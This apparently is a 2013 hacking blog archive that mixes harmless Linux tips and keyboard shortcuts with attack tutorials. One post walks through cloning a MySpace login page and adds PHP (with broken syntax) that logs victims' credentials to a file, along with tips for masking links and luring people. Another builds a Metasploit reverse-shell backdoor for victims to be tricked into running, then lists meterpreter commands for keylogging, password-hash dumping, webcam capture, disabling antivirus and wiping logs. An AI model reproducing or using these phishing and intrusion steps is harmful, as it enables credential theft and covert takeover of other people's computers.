Wednesday 27 November 2013

Make Ubuntu Pentest OS

MakePentest OS on Ubuntu by LukaSikic

hi,today i will show you how to make pentest OS from Ubuntu

1.Enable ROOT
2.Install Desktop environment (i will use XFCE/XUBUNTU session)
3.Install Pentest tools (from Kali Linux)



1.Enable ROOT:

Commands:

$sudo passwd root

$sudo sh -c 'echo "greeter-show-manual-login=true" >>/etc/lightdm/lightdm.conf'

Restartyour Computer.

Clickon “Login” and type “root” as username, type your passwordyou set it before.



  1. Install Desktop environment:
Thats easy, we willinstall xubuntu desktop environment using apt-get
Command:$ sudoadd-apt-repository ppa:xubuntu-dev/xfce-4.10
$apt-get install xubuntu-desktop
Log out/reboot and use rootusername for login and click on ubuntu logo in right-up side in LoginForm and choose “xubuntu”



When you login you will see xubuntu desktop, it dont have pentest tools, but in next step I willshow you how to install Kali Linux tools.

  1. Install Pentest tools:
In this step I will show you howto install pentest tools from best pentest OS named “Kali Linux”.

a.)Install synaptic: $ apt-getinstall gdebi && apt-get install synaptic
b.)Open with file editor /etc/apt/sources.list and add these lines:

deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntuprecise main
deb-srchttp://ppa.launchpad.net/wagungs/kali-linux/ubuntuprecise main
debhttp://ppa.launchpad.net/wagungs/kali-linux2/ubuntuprecise main
deb-srchttp://ppa.launchpad.net/wagungs/kali-linux2/ubuntuprecise main

      c.) Make new file on desktop named “pgp-key.txt”, open it and paste this:
      -----BEGIN PGP PUBLIC KEY BLOCK-----
      Version: SKS 1.1.4
      Comment: Hostname: keyserver.ubuntu.com

      mI0ET324YwEEANbSlISrOlAGjxgFRxiN6jk0JIl/vxQ8lapRdxZ4DHDAQdXbX4AuigMBkP5e
      sOxhMpDnkgMRtEVpaBMdQheA0/431pPQYqkr3jdeZw5JS5opiyJ4qr/QrcoSFHSluEkWkbZ6
      RYOkA25vW31KK2FB2LQVRYk580llXAVgIUznm2ATABEBAAG0GExhdW5jaHBhZCBQUEEgZm9y
      IHdhZ3VuZ4i4BBMBAgAiBQJPfbhjAhsDBgsJCAcDAgYVCAIJCgsEFgIDAQIeAQIXgAAKCRAb
      IuuNj9/bVxabBADSGN8cp+hqkdZqwq263wdz/UGsiuB1bCrH06/HznC/ZC5rjfH3aQ1Dwwag
      zYCrSD3c0cKNAqD10009N76RMlzZBH8kKL9khH3zPL/k4/lYuVP7y6NKFbBsnawEUc0mWcCa
      mH4ScTdWWPXP/mOQiUUjnQ1bZhzpcbQOb+hEUAqExg==
      =fJ+8
      -----END PGP PUBLIC KEY BLOCK-----


      d.) Now , open synaptic , go to : settings >>> repositories , In software sources go to : Authentication >>> Import key file.
      Navigate to your Desktop and double clic on the pgp-key txt file.
      Close everything and in Terminal : apt-get update && apt-get dist-upgrade.

      e.) Now Open Synaptic and clic on ORIGINE tab on the bottom left . You will see repositories links appearing on the top left of Synaptic.
      Highlite the 2nd and the 3rd repository line as shown in the video .
      Start installing your tools using Synaptic . ( Install 10 tools at the time , if any tool will mark itself in red color , untick it and proceed , You can come back to it later on and re-install it , sometime you need some extra dependencies , so some tools will install them for you )
TUTORIALBY LACERATUS

Monday 25 November 2013

How to remove Dual-Boot

Hello everyone
                            Today I will teach you how to get back to single operating system after dual boot

So first the sceneiro is that Alex uses Windows 7 and wants to learn Linux but he doesnt wants to use virtualbox for some reason so he wants it to be dualboot.
So he installed Kali linux from live cd as a second OS now after some months he understood Linux and now doesnt wants to keep Windows so what will he do now ?

Well if he delets the partition then yeah windows will be removed but what about the space left in the HDD well to get the linux full HDD what should he do ?

(Before you do this please keep a backup of your files )

1. Boot up in you live cd e.g Kali Linux
2. Open Gparted and resize the linux partition but remember It is a RISK so while you resize dont interfere the process or else you will looose alll your files and you will be OS-less .

-Admin (Zakir)
Have a good day

Change Hostname In Kali Linux

Hello Everyone Today I will Teach You how to change hostname in Kali linux

1. What is hostname ?

Hostname is the name of the computer user or you can say the administrator of the computer .

e.g  the text after root@  is called hostname here it is 

root@13373XP1017



By default it will be something like root or admin or kali , so to change it ...

1. Open terminal and type hostname [the name you want ] and press enter
e.g hostname ethicalhacker 

2. type [text editor] /etc/hostname and press enter
e.g leafpad /etc.hostname 

A text will apper the old hostname change the text to the hostname you entered in terminal and save it .

Doneeee

Check this video to understand better 



Friday 22 November 2013

What is Botnet ?

Botnets

A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing among them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.

Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware 
Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

Adware
Its exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring
A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.

Thursday 21 November 2013

Terminal Banner for Linux Users

Hello Everyone Today in this post I will teach you how to get a banner for your terminal.(Video Available at the End of the Post)



To get a banner first we need "figlet" and then we have to configure it. Its Easy ..

Steps:
              1. Open terminal and type " apt-get install figlet " (without quotation marks)
2. after you installed figlet type on terminal 
 " [texteditor] /root/.bashrc " and press enter
eg. leafpad /root/.bashrc

3. Now when the text editor will open go to the end and there will be written at the last line fi now press enter and go to a new line and type " figlet [the text you want as your banner] "

for example " figlet Welcome "

Watch the Video for better understanding :)

Video:


  

Sunday 17 November 2013

Hide IP

Hide your Real IP Location and Browse Anonymously
---------------------------------------------------------------------
How Easily you can Hide your Real IP Location and Browse Anonymously? Let's see!

Best IP Hider is SafeIP

I. Anonymous Web Surfing:

If you know your online privacy is maintained is priceless. Internet connection records containing personal information are collected and stored of from billions of Internet users around the world every day. Even with information is collected legally, it could inadvertently fall into the wrong hands and be used for tracking your online behavior, stealing your payment information, identity, or malicious purposes.

SafeIP can be used for free to protect your Internet connection from such threats by concealing your location securing your Internet connection.

II. Unblocking Websites:

Sites like Facebook, YouTube, Gmail, Twitter, and thousands of others are blocked by many schools, universities, offices, ISPs, or even countries. Even most of Google’s services were blocked by China. SafeIP can be used to unblock any website, bypassing filters and firewalls, allowing for a free Internet. SafeIP uses anti-blocking measures to prevent the software itself from being blocked by any Internet Service Provider.

III. SafeIP is best solution for:
> Online Privacy (Hide your Real IP and Surf Anonymously)
> Internet Freedom (Unblock websites and bypass firewalls)
> Streaming Support (Access streaming movie, TV, or radio sites)
> Wireless Mode Protection: Safe surfing on WiFi networks.
> Malware Protection
> Block infected malware and phishing sites.

IV. Download and Install it:
Download

Open your SafeIP and choose your location.

Browse anonymously... and hack safe! 

Saturday 16 November 2013

Some Important Websites

To check if a port is open:

http://www.canyouseeme.org/

To multiple scan a file for viruses:

http://vscan.novirusthanks.org/

To check if a site is down:

http://www.downforeveryoneorjustme.com/

A place to get newest exploits:

http://www.exploit-db.com/

Lets other people view your inserted text:

http://pastebin.com/

The free online crypting + decrypting service:

http://www.crypo.com/

An online MD5 decrypter:

http://www.md5decrypter.com/

The best online Admin Page Finder:

http://sc0rpion.ir/af/

Online WPA cracker:

http://wpa.darkircop.org/

Online Fake Mailer:

http://emkei.cz/

A mailing site ( it gives you a temporary email account to send and receive messages ):

http://10minutemail.com/10MinuteMail/index.html

It gives you alternatives for program's:

http://alternativeto.net/

Upload and send files to friends etc. Very quick:

http://ge.tt/

The best online Admin Page Finder:

http://sc0rpion.ir/af/

Online WPA cracker:

http://wpa.darkircop.org/

Online Fake Mailer:

http://emkei.cz/

http://10minutemail.com/10MinuteMail/index.html

How to make a phishing website (DO IT AT YOUR OWN RISK)

How to make a phisher for a website
1. Intro
There are couple of other phishing tutorials around here, but some people seem to 
have problems understanding them. So I'll try to be as simple as possible, and if you 
have problems understanding it, then you need to get some beginner level computer 
knowledge first.
-This article was written for educational purpose only. I'm not responsible for any 
illegal activity that you may commit.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes the 
username and the password to a file, or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use t35. Go to spam.com and sign up for a free account. In this tutorial we 
will make a phishing site for Myspace(the procedure is equivalent for most of the 
sites). While not signed in myspace, open anyone's profile and click on his picture. 
That will lead you to Myspace's login page that has the red box with"You Must Be 
Logged-In to do That!" just above your login form. Now, click File>Save Page As, and 
save the myspace page to your Desktop. Open your saved page with any text 
editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source 
code there. Name the file 'index.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the 
same function as if it were on the original site. The link to your phish site will be 
'www.xxx.t35.com/index.php' - where 'xxx' is the name of your account. 

But there is a little problem. When someone enters his username and password and 
press login, it logs him into the real myspace. 
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging 
them into the real site, it writes the username and password to a text file. 
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in 
button, search button, etc.). We need to find the 'action=some link' that refers to 
the Login button.

After some searching, we find the: 
<h5 class="heading">
Member Login
</h5>
<form action="http://secure.myspace.com/index.cfm?
fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYW
NrS2V5X18WAgUwY3RsMDAkT 
WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGw
wMCRNYWluJFNwbGFzaERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" 
/>
</div>

and we know that 'action="http://secure.myspace.com/index.cfm?
fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"
and save the file.
Formerly, when you click the login button it would take the values in the username and
password boxes, and execute the functions in the 
'http://secure.myspace.com/index.cfm?fuseaction=login.process' file. 
Now when you click the login button it will take the values in the username in 
password boxes, and execute the functions in the 'login.php' file on your site(which 
doesn't exist yet).
All we have to do now, is to create a 'login.php' file that contains a function that 
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code 
in it: 

<?php
header ('Location: http://myspace.com/
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $val
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of login.php is simple. It opens a file named 'passes.txt'(and creates 
if it doesn't already exist) and enter the informations there(the username and 
password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.t35.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.t35.com/passes.txt
Or you may access it from your account.
Note that you can choose whatever names you like for index.php, login.php and 
passes.txt. but the .php and .txt must stay the same.

Note that you can choose whatever names you like for index.php, login.php and 
passes.txt. but the .php and .txt must stay the same.
4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit. 
Most common way is to make an email similar to the admin, and sending them some 
report with a link to log in the site(your phish site). Ofcourse you will mask the link. 
How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled, you're doing 
this: 
[url=YourPhishSiteLink]TheOriginalSiteLink[/url] 
For example, www.google.com looks like a google, but it leads you to yahoo when you 
click it.

If you're making the phisher for myspace, and want to get random ppl to it, you can 
simply make some hot chick account and put some hot pic that will lead to your phish 
site when clicked. So when they click the lusty image, they will be led to your phish 
site telling them they need to log in to see that.
Like this: 
[url=YourPhishSiteLink][img]link of the image[/img][/url] 
When sending emails see for the option 'hyperlink', and it's self explainable once you
see it.
There are many other ways, and as I said, your creativity is the limit.
5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a 
phisher, and how it works. Although is written for Myspace, the procedure is 
equivalent for almost every other login site(for hotmail is different). After this, it's 
up to you to explore, experiment and dive in the world of social engineering.

Keyboard Shortcuts

Keyboard Shorcuts (Microsoft Windows)
1. CTRL+C (Copy)
2. CTRL+X (Cut)
3. CTRL+V (Paste)
4. CTRL+Z (Undo)
5. DELETE (Delete)
6. SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
7. CTRL while dragging an item (Copy the selected item)
8. CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
9. F2 key (Rename the selected item)
10. CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
11. CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
12. CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
13. CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
14. CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
15. CTRL+A (Select all)
16. F3 key (Search for a file or a folder)
17. ALT+ENTER (View the properties for the selected item)
18. ALT+F4 (Close the active item, or quit the active program)
19. ALT+ENTER (Display the properties of the selected object)
20. ALT+SPACEBAR (Open the shortcut menu for the active window)
21. CTRL+F4 (Close the active document in programs that enable you to have multiple documents opensimultaneou sly)
22. ALT+TAB (Switch between the open items)
23. ALT+ESC (Cycle through items in the order that they had been opened)
24. F6 key (Cycle through the screen elements in a window or on the desktop)
25. F4 key (Display the Address bar list in My Computer or Windows Explorer)
26. SHIFT+F10 (Display the shortcut menu for the selected item)
27. ALT+SPACEBAR (Display the System menu for the active window)
28. CTRL+ESC (Display the Start menu)
29. ALT+Underlined letter in a menu name (Display the corresponding menu) Underlined letter in a command name on an open menu (Perform the corresponding command)
30. F10 key (Activate the menu bar in the active program)
31. RIGHT ARROW (Open the next menu to the right, or open a submenu)
32. LEFT ARROW (Open the next menu to the left, or close a submenu)
33. F5 key (Update the active window)
34. BACKSPACE (View the folder onelevel up in My Computer or Windows Explorer)
35. ESC (Cancel the current task)
36. SHIFT when you insert a CD-ROMinto the CD-ROM drive (Prevent the CD-ROM from automatically playing)

Dialog Box - Keyboard Shortcuts
1. CTRL+TAB (Move forward through the tabs)
2. CTRL+SHIFT+TAB (Move backward through the tabs)
3. TAB (Move forward through the options)
4. SHIFT+TAB (Move backward through the options)
5. ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
6. ENTER (Perform the command for the active option or button)
7. SPACEBAR (Select or clear the check box if the active option is a check box)
8. Arrow keys (Select a button if the active option is a group of option buttons)
9. F1 key (Display Help)
10. F4 key (Display the items in the active list)
11. BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)

Microsoft Natural Keyboard Shortcuts
1. Windows Logo (Display or hide the Start menu)
2. Windows Logo+BREAK (Display the System Properties dialog box)
3. Windows Logo+D (Display the desktop)
4. Windows Logo+M (Minimize all of the windows)
5. Windows Logo+SHIFT+M (Restorethe minimized windows)
6. Windows Logo+E (Open My Computer)
7. Windows Logo+F (Search for a file or a folder)
8. CTRL+Windows Logo+F (Search for computers)
9. Windows Logo+F1 (Display Windows Help)
10. Windows Logo+ L (Lock the keyboard)
11. Windows Logo+R (Open the Run dialog box)
12. Windows Logo+U (Open Utility Manager)
13. Accessibility Keyboard Shortcuts
14. Right SHIFT for eight seconds (Switch FilterKeys either on or off)
15. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
16. Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
17. SHIFT five times (Switch the StickyKeys either on or off)
18. NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
19. Windows Logo +U (Open Utility Manager)
20. Windows Explorer Keyboard Shortcuts
21. END (Display the bottom of the active window)
22. HOME (Display the top of the active window)
23. NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
24. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

MMC Console Windows Shortcut keys

1. SHIFT+F10 (Display the Action shortcut menu for the selected item)
2. F1 key (Open the Help topic, if any, for the selected item)
3. F5 key (Update the content of all console windows)
4. CTRL+F10 (Maximize the active console window)
5. CTRL+F5 (Restore the active console window)
6. ALT+ENTER (Display the Properties dialog box, if any, for theselected item)
7. F2 key (Rename the selected item)
8. CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote Desktop Connection Navigation
1. CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
2. ALT+PAGE UP (Switch between programs from left to right)
3. ALT+PAGE DOWN (Switch between programs from right to left)
4. ALT+INSERT (Cycle through the programs in most recently used order)
5. ALT+HOME (Display the Start menu)
6. CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
7. ALT+DELETE (Display the Windows menu)
8. CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
9. CTRL+ALT+Plus sign (+) (Place asnapshot of the entire client window area on the Terminal server clipboardand provide the same functionality aspressing ALT+PRINT SCREEN on a local computer.)

Microsoft Internet Explorer Keyboard Shortcuts
1. CTRL+B (Open the Organize Favorites dialog box)
2. CTRL+E (Open the Search bar)
3. CTRL+F (Start the Find utility)
4. CTRL+H (Open the History bar)
5. CTRL+I (Open the Favorites bar)
6. CTRL+L (Open the Open dialog box)
7. CTRL+N (Start another instance of the browser with the same Web address)
8. CTRL+O (Open the Open dialog box,the same as CTRL+L)
9. CTRL+P (Open the Print dialog box)
10. CTRL+R (Update the current Web )

Friday 15 November 2013

Using Metasploit to Hack a Windows 7 machine + Meterpreter Commands

This tutorial is only for EDUCATIONAL purpose
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!
Do IT AT YOUR OWN RISK!!!

(After the TEXT format there is the video of this tutorial, and after video there is meterpreter commands)


Requirements:
             1.Kali Linux/Backtrack
             2.Metasploit Framework

Steps:
      1.Open Terminal and type " service postgresql start && service metasploit start " (without quotation)









2.Now we need to create a payload for the machine
command for creating a payload 

msfpayload windows/meterpreter/reverse_tcp LHOST=yourip LPORT=4444 x > /root/backdoor.exe '




okay here after LHOST=enter your ip (to get your ip open terminal and type ifconfig and get the ip )


3.Use your social engineering skill to run the payload in the victim machine.


4.After you are successfully complete step 3 


5.Open the terminal and type  " service postgresql start && service metasploit start "   (without quotation)


6.And type ' msfconsole '


and then type the following 


use exploit/multi/handler (press enter)

set payload windows/meterpreter/reverse_tcp (press enter)
set lhost (the ip you provided while creating the payload) (press enter)
set lport 4444 (press enter)
exploit
      



Once you successfully compromised it will be like the following



      

Video: 





                                                          Meterpreter Commands:
                      1. sysinfo -----> shows the system build x86 or x64, language version, build...etc

2. run checkvm    ------>  checks to see if the victim is running a Virtual Machine or native.


3. route   --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc


4. run get_application_list  -------> This shows you applications installed on the remotye PC


5. uictl  --------->  Control Some of the User Interface Compon­ents


6. idletime ----->  shows how long the victim has not been active on the computer.


7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.


8. getuid -------> This will show you the system identity and show you who you are running as such as system.


9. ps ------> This shows all the processes running on the victim as well as the PID's


10. run get_env -------> This willl give you a lot of info on the system


11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.


12. ? ------> Shows a list of different commands.


13. getsystem -----> attempts give you local system privelages


14. reboot ------> Reboot the remote machine


15. sc config process_name start= disabled  --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.


16. clearev -------> Wipes all event logs.


17. execute -f cmd.exe -H -c  ------>  Open a command prompt on a hidden channel.


18. interact 1  ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.


19. download  -------> This command will download the specified command.  "Example"    download c:\\boot.ini


20. upload --------> upload files to the victim machine


21. portfwd ------> forward a local port to a remote service


22. run getgui -e  ------> this will enable remote desktop on the victim.


23. run gettelnet –e  -------> To enable telnet on remote machine.


24. run getcountermeasure  ------>  checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc


25. run killav  ------->   it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.


26. run get_local_subnets  ------>  used to get the local subnet of the victim machine.


27. run hostedit  ------->  allows the attacker to add entries to the Windows host file.  As a result of Windows checking the hosts file first, we can divert traffic to a fake entry


28. run remotewinenum  -------> designed to enumerate the target system with the wmic command


30. run winenum ------->  used for system enumeration.  It will dump tokens, hashes, and issue both net and wmic commands


31. run scraper  -------->  used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”


32. migrate  --------> Migrate to Another Process such as explorer.exe so you don't loose your session.


33. cat  ------->  Read the Contents of a File to the Screen


34. background  "or ctrl + z"  -------->  Back­ground the Current Session


35. irb -------> Drop into irb Scripting Mode


36. interact  --------> Interact with a Channel


37. load ------> Load One or More Meterp­reter Extensions.


38. channel  -------> Displays Info About Active Channels


39. bgkill  --------->  Kill a Background Meterp­reter Script


40. close  -------->  Close a Channel


41. enumdesktops  -------->  List All Accessible Desktops and Window Stations


42. getdesktop  ------->  Get the Current Meterp­reter Desktop


43. lpwd  -------->  Print Local Working Directory


44. ls  -------->  list Files


45. rm  -------->  Delete the Specified File


46. search  -------->  Search for Files.


47. upload  ------>  Upload File to Target


48. keyscan_start  -------->  Start Capturing Keystrokes


49. keyscan_stop Stop Capturing Keystrokes


49. keyscan_dump  -------->   Dump the Keystroke Buffer


50. screenshot  -------->   Scre­enshot of the GUI


51. setdesktop  --------->  Change the Meterp­reters Current Desktop.


52. getprivs  --------->  Attempt to Enable All Privileges Available to the Current Process


53. kill -------->  Terminate a Process    "Example"   kill 1834


54. reboot  -------->  Reboots the Remote Computer


55. reg  --------->  Interact with the Remote Registry.


56. rev2self  --------->  Calls Revert­ToS­elf() on the Remote Machine


57. shell  --------> Drop into a system shell.


58. shutdown  -------->  Shuts Down the Remote Computer


59. steal_token  ------>  Attempt to Steal an Impersonation Token from the Process


60. webcam_list  -------->  List webcams


61. webcam_snap  ------->  Take a snapshot from the specified webcam.


62. hashdump  -------->  Dumps the content of the SAM Database.


63. timestomp  ------->  Manipulates MACE Attributes


64. execute  ------> Execute a command.


65. info  -------->  Display info about active post module.


66. quit  -------->  Terminate the meterpreter session.


67. getwd  ------->  Print Working Directory


68. mkdir  ------->  make directory.


69. pwd  -------> print working directory.


70. drop_token  ------->  Relinquishes Any Active Impersonation Token


71. rmdir  --------> remove directory.



72. del  -------> delete file "exmple"  del passwords.txt